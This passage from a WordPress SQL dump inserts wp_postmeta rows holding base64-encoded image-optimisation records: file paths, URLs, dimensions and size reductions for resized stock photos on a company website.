V0dGVyc3RvY2tfMTgwMTU2Mjc1LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4MDE1NjI3NS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTA0NSwidGltZSI6MTQ4MzU4NDMwOSwiaWQiOjcwMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTgwMTU2Mjc1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4MDE1NjI3NS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODAxNTYyNzUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjk2MiwidGltZSI6MTQ4MzU4NDMxNCwiaWQiOjcwMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTgwMTU2Mjc1LTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODAxNTYyNzUtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODAxNTYyNzUtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTk2NSwidGltZSI6MTQ4MzU4NDMxOSwiaWQiOjcwMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTgwMTU2Mjc1LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4MDE1NjI3NS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODAxNTYyNzUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjcwMCwidGltZSI6MTQ4MzU4NDMyMiwiaWQiOjcwMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTgwMTU2Mjc1LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4MDE1NjI3NS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODAxNTYyNzUtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjU1NCwidGltZSI6MTQ4MzU4NDMyNiwiaWQiOjcwMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTgwMTU2Mjc1LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4MDE1NjI3NS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODAxNTYyNzUtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjY0MSwidGltZSI6MTQ4MzU4NDMyOSwiaWQiOjcwMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTgwMTU2Mjc1LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4MDE1NjI3NS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODAxNTYyNzUtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjg2MywidGltZSI6MTQ4MzU4NDMzMywiaWQiOjcwMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODAxNTYyNzUtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTgwMTU2Mjc1LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4MDE1NjI3NS0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NTg1LCJ0aW1lIjoxNDgzNTg0MzM2LCJpZCI6NzAwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4MDE1NjI3NS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODAxNTYyNzUtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTgwMTU2Mjc1LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo3MDMsInRpbWUiOjE0ODM1ODQzNDAsImlkIjo3MDB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTgwMTU2Mjc1LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4MDE1NjI3NS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODAxNTYyNzUtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjg4NCwidGltZSI6MTQ4MzU4NDM0MywiaWQiOjcwMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODAxNTYyNzUtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTgwMTU2Mjc1LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4MDE1NjI3NS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MTAwMCwidGltZSI6MTQ4MzU4NDM0NywiaWQiOjcwMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODAxNTYyNzUtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTgwMTU2Mjc1LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4MDE1NjI3NS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MTE2MiwidGltZSI6MTQ4MzU4NDM1MSwiaWQiOjcwMH1d'); 
INSERT INTO `wp_postmeta` VALUES (30085, 699, 'wpfc_optimisation_reduction', '1111144'); 
INSERT INTO `wp_postmeta` VALUES (30086, 699, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1NzIzOTI4NC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTcyMzkyODQuanBnIiwid2lkdGgiOjQ0NzIsImhlaWdodCI6MzY2OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTcyMzkyODQuanBnIiwicmVkdWN0aW9uIjoxMTExMTMxLCJ0aW1lIjoxNDgzNTg0MzYyLCJpZCI6IjY5OSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1NzIzOTI4NC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTcyMzkyODQtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU3MjM5Mjg0LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg0MzY1LCJpZCI6Njk5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTcyMzkyODQtODAweDY1Ni5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjY1NiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU3MjM5Mjg0LTgwMHg2NTYuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1NzIzOTI4NC04MDB4NjU2LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NDM2OSwiaWQiOjY5OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU3MjM5Mjg0LTc2OHg2MzAuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo2MzAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1NzIzOTI4NC03Njh4NjMwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTcyMzkyODQtNzY4eDYzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODQzNzIsImlkIjo2OTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1NzIzOTI4NC0xNjAweDEzMTIuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTMxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU3MjM5Mjg0LTE2MDB4MTMxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU3MjM5Mjg0LTE2MDB4MTMxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODQzNzYsImlkIjo2OTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1NzIzOTI4NC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTcyMzkyODQtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU3MjM5Mjg0LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg0Mzc5LCJpZCI6Njk5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTcyMzkyODQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU3MjM5Mjg0LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1NzIzOTI4NC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NDM4MSwiaWQiOjY5OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU3MjM5Mjg0LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1NzIzOTI4NC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTcyMzkyODQtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODQzODQsImlkIjo2OTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1NzIzOTI4NC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTcyMzkyODQtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU3MjM5Mjg0LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg0Mzg3LCJpZCI6Njk5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1NzIzOTI4NC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTcyMzkyODQtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU3MjM5Mjg0LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg0MzkwLCJpZCI6Njk5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1NzIzOTI4NC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTcyMzkyODQtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU3MjM5Mjg0LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg0MzkyLCJpZCI6Njk5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1NzIzOTI4NC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTcyMzkyODQtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU3MjM5Mjg0LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg0Mzk1LCJpZCI6Njk5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1NzIzOTI4NC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTcyMzkyODQtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU3MjM5Mjg0LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg0Mzk4LCJpZCI6Njk5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE1NzIzOTI4NC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xNTcyMzkyODQtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTU3MjM5Mjg0LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg0NDAxLCJpZCI6Njk5fV0='); 
INSERT INTO `wp_postmeta` VALUES (30087, 698, 'wpfc_optimisation_reduction', '9872'); 
